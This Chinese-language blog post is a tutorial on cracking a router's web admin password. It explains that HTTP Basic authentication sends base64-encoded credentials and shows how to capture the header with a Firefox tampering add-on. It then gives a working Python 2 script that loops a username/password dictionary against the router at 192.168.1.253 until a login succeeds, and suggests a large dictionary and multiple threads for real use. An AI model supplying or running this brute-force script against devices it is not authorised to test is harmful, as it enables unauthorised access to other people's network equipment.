对于破解路由器密码

先看上面的文章

------------

Evi1m0 Daniel破解了路由器的连接密码，然后破解了路由器的管理登录密码. 此过程是一次性的，因此在这里我将详细讨论.

首先，什么是http基本认证？

在HTTP协议进行通信的过程中，HTTP协议定义了基本认证过程以允许HTTP服务器对WEB浏览器进行用户的方法，当一个客户端向HTTP服务 器进行数据请求时，如果客户端未被认证，则HTTP服务器将通过基本认证过程对客户端的用户名及密码进行验证，以决定用户是否合法。客户端在接收到HTTP服务器的身份认证要求后，会提示用户输入用户名及密码，然后将用户名及密码以BASE64加密，加密后的密文将附加于请求信息中， 如当用户名为anjuta，密码为：123456时，客户端将用户名和密码用“：”合并，并将合并后的字符串用BASE64加密为密文，并于每次请求数据 时，将密文附加于请求头（Request Header）中。HTTP服务器在每次收到请求包后，根据协议取得客户端附加的用户信息（BASE64加密的用户名和密码），解开请求包，对用户名及密码进行验证，如果用 户名及密码正确，则根据客户端请求，返回客户端所需要的数据;否则，返回错误代码或重新要求客户端提供用户名及密码。

让我们先抓取数据包，看看http标头是什么样子.

我使用firefox +篡改数据，请先安装此插件.

安装后，按Alt键显示菜单栏，工具-篡改数据，

打开路由器的登录URL，我的是

点击上方的启动篡改，然后输入帐户密码，

点击篡改以拦截此请求，然后您可以看到

请参阅授权，以下显然是base64编码的内容，让我们对其进行解码并查看

这是我们的帐户密码，中间带有一个冒号，然后是base64编码.

了解基本原理，我们可以编写一个程序来破解它.

找到一个帐户和密码字典，对其进行编码，然后将其添加到http标头中. 这很容易.

#coding:utf-8
import base64
import urllib2
password_dic = [["root", "root"], ["admin", "admin"], ["admin", "rootroot"]]
request = urllib2.Request('http://192.168.1.253')
#request.add_header('Authorization', 'Basic YWRtaW46cm9vdHJvb3Q=')
for item in password_dic:
    psw_base64 = "Basic " + base64.b64encode(item[0] + ":" + item[1])
    request.add_header('Authorization', psw_base64)
    try:
        response = urllib2.urlopen(request)
        print "Correct! Username: %s, password: %s" % (item[0], item[1])
        break
    except urllib2.HTTPError:
        print "Error!"

使用python随附的urllib2，上面的password_dic由我自己编写. 如果您真的想破解它，它将有一个大词典，它将在多个线程中运行.

request.add_header('Authorization', psw_base64)

就将我们构造的账号密码的http头加进去了。

本文来自本站，转载请注明本文网址：
http://www.pc-fly.com/a/tongxingongju/article-296389-1.html